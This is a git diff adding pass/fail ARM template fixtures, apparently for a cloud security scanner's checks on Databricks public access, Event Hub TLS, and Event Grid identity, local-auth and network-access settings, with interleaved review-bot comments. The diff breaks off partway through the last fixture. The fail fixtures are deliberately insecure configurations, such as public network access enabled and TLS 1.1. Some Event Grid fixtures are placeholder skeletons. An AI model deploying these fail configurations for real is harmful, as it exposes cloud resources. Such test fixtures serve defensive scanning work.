@@ -0,0 +1,78 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "prepareEncryption": { + "value": true + }, + "encryption": { + "value": { + "keySource": "Microsoft.Keyvault", + "keyvaulturi": "[uri(format('https://{0}{1}', parameters('keyVaultName'), environment().suffixes.keyvaultDns), '/')]", + "KeyName": "[parameters('keyName')]" + } + }, + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file 
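Review bot: The negative fixtures only cover `prepareEncryption` absent (`fail.json`) and `false` (`fail2.json`), so the realistic misconfiguration, `prepareEncryption` set to `true` while the `encryption` parameter is omitted or left at the Microsoft-managed `"keySource": "Default"`, is untested and its result unpinned; a `fail3.json` copying this template with `"encryption": { "value": { "keySource": "Default" } }` would cover it. The pass fixture itself looks right: `keyvaulturi` is built from `environment().suffixes.keyvaultDns` rather than a hard-coded suffix, and `KeyName` without a `keyversion` lets Key Vault rotation apply. One realism nit: `pricingTier` still allows `standard`, while customer-managed keys for the DBFS root require the premium SKU as far as I recall, so `"allowedValues": ["premium"]` would keep this pass template deployable.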
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json new file mode 100644 index 00000000000..62aa4f41eda --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail.json @@ -0,0 +1,69 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "publicNetworkAccess": "Enabled", + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file 
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json new file mode 100644 index 00000000000..b8ca21f4a5b --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/fail2.json @@ -0,0 +1,68 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file 
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json new file mode 100644 index 00000000000..64772cc8e6a --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass.json @@ -0,0 +1,70 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "publicNetworkAccess": "Disabled", + "requiredNsgRules": "AllRules", + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file 
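Review bot: `pass.json` and `pass2.json` differ only in `requiredNsgRules` (`AllRules` vs `NoAzureDatabricksRules`), and `enableNoPublicIp` is an unresolved parameter in every fixture, so the check evidently keys on `properties.publicNetworkAccess` alone; that scope should be spelled out in the check's docstring, e.g. `Evaluates publicNetworkAccess only (front-end access); secure cluster connectivity (enableNoPublicIp) is a separate control.` If I recall the platform constraint correctly, disabling public network access requires secure cluster connectivity, so `"enableNoPublicIp": { "value": true }` would turn this pass fixture into a realistic, deployable configuration instead of one that passes regardless of the parameter.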
diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json new file mode 100644 index 00000000000..6b687ab7b3e --- /dev/null +++ b/tests/arm/checks/resource/example_DatabricksWorkspaceIsNotPublic/pass2.json @@ -0,0 +1,70 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "managedResourceGroupName": { + "type": "string" + }, + "workspaceName": { + "type": "string", + "metadata": { + "description": "The name of the Azure Databricks workspace to create." + } + }, + "location": { + "type": "string", + "metadata": { + "description": "Location for all resources." + } + }, + "pricingTier": { + "type": "string", + "allowedValues": [ + "standard", + "premium" + ], + "metadata": { + "description": "The pricing tier of workspace." + } + }, + "keyVaultName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault name." + } + }, + "keyName": { + "type": "string", + "metadata": { + "description": "The Azure Key Vault encryption key name." + } + }, + "disablePublicIp": { + "type": "bool", + "metadata": { + "description": "Specifies whether to deploy Azure Databricks workspace with Secure Cluster Connectivity (No Public IP) enabled or not" + } + } + }, + "resources": [ + { + "type": "Microsoft.Databricks/workspaces", + "apiVersion": "2023-02-01", + "name": "[parameters('workspaceName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('pricingTier')]" + }, + "properties": { + "publicNetworkAccess": "Disabled", + "requiredNsgRules": "NoAzureDatabricksRules", + "managedResourceGroupId": "[subscriptionResourceId('Microsoft.Resources/resourceGroups', parameters('managedResourceGroupName'))]", + "parameters": { + "enableNoPublicIp": { + "value": "[parameters('disablePublicIp')]" + } + } + } + } + ] + } \ No newline at end of file 
diff --git a/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/fail.json b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/fail.json
new file mode 100644
index 00000000000..017acac3d04
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/fail.json
@@ -0,0 +1,18 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.EventHub/namespaces",
+ "apiVersion": "2024-01-01",
+ "name": "fail",
+ "location": "[resourceGroup().location]",
+ "sku": {
+ "name": "Standard"
+ },
+ "properties": {
+ "minimumTlsVersion": "1.1"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass.json b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass.json
new file mode 100644
index 00000000000..3a874bba5ba
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass.json
@@ -0,0 +1,22 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.EventHub/namespaces",
+ "apiVersion": "2024-01-01",
+ "name": "pass",
+ "location": "[resourceGroup().location]",
+ "sku": {
+ "name": "Standard",
+ "capacity": 2
+ },
+ "properties": {
+ "minimumTlsVersion": "1.2"
+ },
+ "tags": {
+ "environment": "Production"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass2.json b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass2.json
new file mode 100644
index 00000000000..edbaea43841
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventHubNamespaceMinTLS12/pass2.json
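Review bot: The only failing value exercised is `"minimumTlsVersion": "1.1"`; the `2024-01-01` API also accepts `"1.0"`, which is the weaker setting and must fail as well, so a `fail2.json` with `"minimumTlsVersion": "1.0"` would pin that the check rejects both legacy versions rather than matching a single string. The fixture is otherwise minimal and fine.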
@@ -0,0 +1,15 @@
+{
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "resources": [
+ {
+ "type": "Microsoft.EventHub/namespaces",
+ "apiVersion": "2024-01-01",
+ "name": "pass2",
+ "location": "[resourceGroup().location]",
+ "sku": {
+ "name": "Standard"
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/fail.json b/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/fail.json
new file mode 100644
index 00000000000..583db158b9e
--- /dev/null
+++ b/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/fail.json
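Review bot: `pass2.json` sets no `minimumTlsVersion`, so the check treats the absent property as compliant; that is correct only because the Event Hubs service defaults a namespace to TLS 1.2, and that dependency on a platform default belongs in the check's docstring or a comment, e.g. `# Azure defaults minimumTlsVersion to "1.2"; only an explicit "1.0"/"1.1" is a finding`. Without it, a future reader cannot tell whether the missing-property pass is deliberate or an accident of the property lookup.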
@@ -0,0 +1,95 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.EventGrid/topics", + "apiVersion": "2023-12-15-preview", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "sku": { + "name": "string" + }, + "kind": "string", + "extendedLocation": { + "name": "string", + "type": "string" + }, + "identity": { + "principalId": "string", + "tenantId": "string", + "userAssignedIdentities": { + "{customized property}": { + "clientId": "string", + "principalId": "string" + } + } + }, + "properties": { + "dataResidencyBoundary": "string", + "eventTypeInfo": { + "inlineEventTypes": { + "{customized property}": { + "dataSchemaUrl": "string", + "description": "string", + "displayName": "string", + "documentationUrl": "string" + } + }, + "kind": "Inline" + }, + "inboundIpRules": [ + { + "action": "Allow", + "ipMask": "string" + } + ], + "inputSchema": "string", + "inputSchemaMapping": { + "inputSchemaMappingType": "string" + }, + "minimumTlsVersionAllowed": "string" + } + } 
+ ] +} + diff --git a/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/pass.json b/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/pass.json new file mode 100644 index 00000000000..e67839a5799 --- /dev/null +++ b/tests/arm/checks/resource/example_EventgridTopicIdentityProviderEnabled/pass.json 
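Review bot: The fixture carries `parameters` and `variables` lifted from an App Service template (`webAppName`, `sku`, `linuxFxVersion` defaulting to `php|7.0`, `webAppPortalName`, `appServicePlanName`) that the `Microsoft.EventGrid/topics` resource never references, and the resource body is the ARM reference skeleton with `string` placeholders (`"location": "string"`, `inboundIpRules` with `"ipMask": "string"`, `"minimumTlsVersionAllowed": "string"`), which buries the one thing that makes it fail: `identity` carries only the read-only `principalId`/`tenantId` and no `type`. Trimming the fixture to the topic with a realistic `location` and `sku` and an `identity` block that simply lacks `type` would make the tested condition obvious at a glance and stop the unused parameters from misleading anyone who reads it as an example.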
@@ -0,0 +1,98 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.EventGrid/topics", + "apiVersion": "2023-12-15-preview", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "sku": { + "name": "string" + }, + "kind": "string", + "extendedLocation": { + "name": "string", + "type": "string" + }, + "identity": { + "principalId": "string", + "tenantId": "string", + "type": "string", + "userAssignedIdentities": { + "{customized property}": { + "clientId": "string", + "principalId": "string" + } + } + }, + "properties": { + "dataResidencyBoundary": "string", + "disableLocalAuth": false, + "eventTypeInfo": { + "inlineEventTypes": { + "{customized property}": { + "dataSchemaUrl": "string", + "description": "string", + "displayName": "string", + "documentationUrl": "string" + } + }, + "kind": "Inline" + }, + "inboundIpRules": [ + { + "action": "Allow", + "ipMask": "string" + } + ], + "inputSchema": "string", + "inputSchemaMapping": { + "inputSchemaMappingType": "string" + 
}, + "minimumTlsVersionAllowed": "string", + "publicNetworkAccess": "disabled" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail.json b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail.json new file mode 100644 index 00000000000..8893122962d --- /dev/null +++ b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail.json 
@@ -0,0 +1,96 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.EventGrid/topics", + "apiVersion": "2023-12-15-preview", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "sku": { + "name": "string" + }, + "kind": "string", + "extendedLocation": { + "name": "string", + "type": "string" + }, + "identity": { + "principalId": "string", + "tenantId": "string", + "type": "string", + "userAssignedIdentities": { + "{customized property}": { + "clientId": "string", + "principalId": "string" + } + } + }, + "properties": { + "dataResidencyBoundary": "string", + "eventTypeInfo": { + "inlineEventTypes": { + "{customized property}": { + "dataSchemaUrl": "string", + "description": "string", + "displayName": "string", + "documentationUrl": "string" + } + }, + "kind": "Inline" + }, + "inboundIpRules": [ + { + "action": "Allow", + "ipMask": "string" + } + ], + "inputSchema": "string", + "inputSchemaMapping": { + "inputSchemaMappingType": "string" + }, + 
"minimumTlsVersionAllowed": "string" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail2.json b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail2.json new file mode 100644 index 00000000000..110ef2c2c13 --- /dev/null +++ b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/fail2.json 
@@ -0,0 +1,98 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.EventGrid/topics", + "apiVersion": "2023-12-15-preview", + "name": "fail2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "sku": { + "name": "string" + }, + "kind": "string", + "extendedLocation": { + "name": "string", + "type": "string" + }, + "identity": { + "principalId": "string", + "tenantId": "string", + "type": "string", + "userAssignedIdentities": { + "{customized property}": { + "clientId": "string", + "principalId": "string" + } + } + }, + "properties": { + "dataResidencyBoundary": "string", + "disableLocalAuth": false, + "eventTypeInfo": { + "inlineEventTypes": { + "{customized property}": { + "dataSchemaUrl": "string", + "description": "string", + "displayName": "string", + "documentationUrl": "string" + } + }, + "kind": "Inline" + }, + "inboundIpRules": [ + { + "action": "Allow", + "ipMask": "string" + } + ], + "inputSchema": "string", + "inputSchemaMapping": { + "inputSchemaMappingType": "string" + 
}, + "minimumTlsVersionAllowed": "string", + "publicNetworkAccess": "enabled" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/pass.json b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/pass.json new file mode 100644 index 00000000000..bb818e68aa3 --- /dev/null +++ b/tests/arm/checks/resource/example_EventgridTopicLocalAuthentication/pass.json 
@@ -0,0 +1,98 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.EventGrid/topics", + "apiVersion": "2023-12-15-preview", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "sku": { + "name": "string" + }, + "kind": "string", + "extendedLocation": { + "name": "string", + "type": "string" + }, + "identity": { + "principalId": "string", + "tenantId": "string", + "type": "string", + "userAssignedIdentities": { + "{customized property}": { + "clientId": "string", + "principalId": "string" + } + } + }, + "properties": { + "dataResidencyBoundary": "string", + "disableLocalAuth": true, + "eventTypeInfo": { + "inlineEventTypes": { + "{customized property}": { + "dataSchemaUrl": "string", + "description": "string", + "displayName": "string", + "documentationUrl": "string" + } + }, + "kind": "Inline" + }, + "inboundIpRules": [ + { + "action": "Allow", + "ipMask": "string" + } + ], + "inputSchema": "string", + "inputSchemaMapping": { + "inputSchemaMappingType": "string" + 
}, + "minimumTlsVersionAllowed": "string", + "publicNetworkAccess": "disabled" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail.json b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail.json new file mode 100644 index 00000000000..ebdd9f75e7d --- /dev/null +++ b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail.json 
@@ -0,0 +1,97 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.EventGrid/topics", + "apiVersion": "2023-12-15-preview", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "sku": { + "name": "string" + }, + "kind": "string", + "extendedLocation": { + "name": "string", + "type": "string" + }, + "identity": { + "principalId": "string", + "tenantId": "string", + "type": "string", + "userAssignedIdentities": { + "{customized property}": { + "clientId": "string", + "principalId": "string" + } + } + }, + "properties": { + "dataResidencyBoundary": "string", + "disableLocalAuth": "bool", + "eventTypeInfo": { + "inlineEventTypes": { + "{customized property}": { + "dataSchemaUrl": "string", + "description": "string", + "displayName": "string", + "documentationUrl": "string" + } + }, + "kind": "Inline" + }, + "inboundIpRules": [ + { + "action": "Allow", + "ipMask": "string" + } + ], + "inputSchema": "string", + "inputSchemaMapping": { + "inputSchemaMappingType": "string" + 
}, + "minimumTlsVersionAllowed": "string" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail2.json b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail2.json new file mode 100644 index 00000000000..a49ccae0037 --- /dev/null +++ b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/fail2.json 
@@ -0,0 +1,98 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.EventGrid/topics", + "apiVersion": "2023-12-15-preview", + "name": "fail2", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "sku": { + "name": "string" + }, + "kind": "string", + "extendedLocation": { + "name": "string", + "type": "string" + }, + "identity": { + "principalId": "string", + "tenantId": "string", + "type": "string", + "userAssignedIdentities": { + "{customized property}": { + "clientId": "string", + "principalId": "string" + } + } + }, + "properties": { + "dataResidencyBoundary": "string", + "disableLocalAuth": "bool", + "eventTypeInfo": { + "inlineEventTypes": { + "{customized property}": { + "dataSchemaUrl": "string", + "description": "string", + "displayName": "string", + "documentationUrl": "string" + } + }, + "kind": "Inline" + }, + "inboundIpRules": [ + { + "action": "Allow", + "ipMask": "string" + } + ], + "inputSchema": "string", + "inputSchemaMapping": { + "inputSchemaMappingType": "string" 
+ }, + "minimumTlsVersionAllowed": "string", + "publicNetworkAccess": "Enabled" + } + } + ] +} + diff --git a/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/pass.json b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/pass.json new file mode 100644 index 00000000000..5d651bbb610 --- /dev/null +++ b/tests/arm/checks/resource/example_EventgridTopicNetworkAccess/pass.json 
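Review bot: This fail2 fixture uses `"publicNetworkAccess": "Enabled"` and the pass.json in the next hunk uses `"Disabled"`, while the LocalAuthentication and IdentityProviderEnabled fixtures added earlier in this commit spell the same property `"enabled"`/`"disabled"`. The capitalised form matches the Azure enum, but if the check compares case-sensitively only one spelling is exercised and a template using the other casing would get the opposite verdict without any test noticing; the check itself is not visible here, so this may already be handled. A lowercase `"disabled"` pass fixture (or a case-insensitive comparison in the check) would make the intended behaviour explicit. The `"disableLocalAuth": "bool"` placeholder copied from the template reference is irrelevant to this check but is not a boolean; `false` would keep the fixture valid for the sibling LocalAuthentication check.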
@@ -0,0 +1,98 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku": { + "type": "string", + "defaultValue": "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion": { + "type": "string", + "defaultValue": "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]", + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.EventGrid/topics", + "apiVersion": "2023-12-15-preview", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "sku": { + "name": "string" + }, + "kind": "string", + "extendedLocation": { + "name": "string", + "type": "string" + }, + "identity": { + "principalId": "string", + "tenantId": "string", + "type": "string", + "userAssignedIdentities": { + "{customized property}": { + "clientId": "string", + "principalId": "string" + } + } + }, + 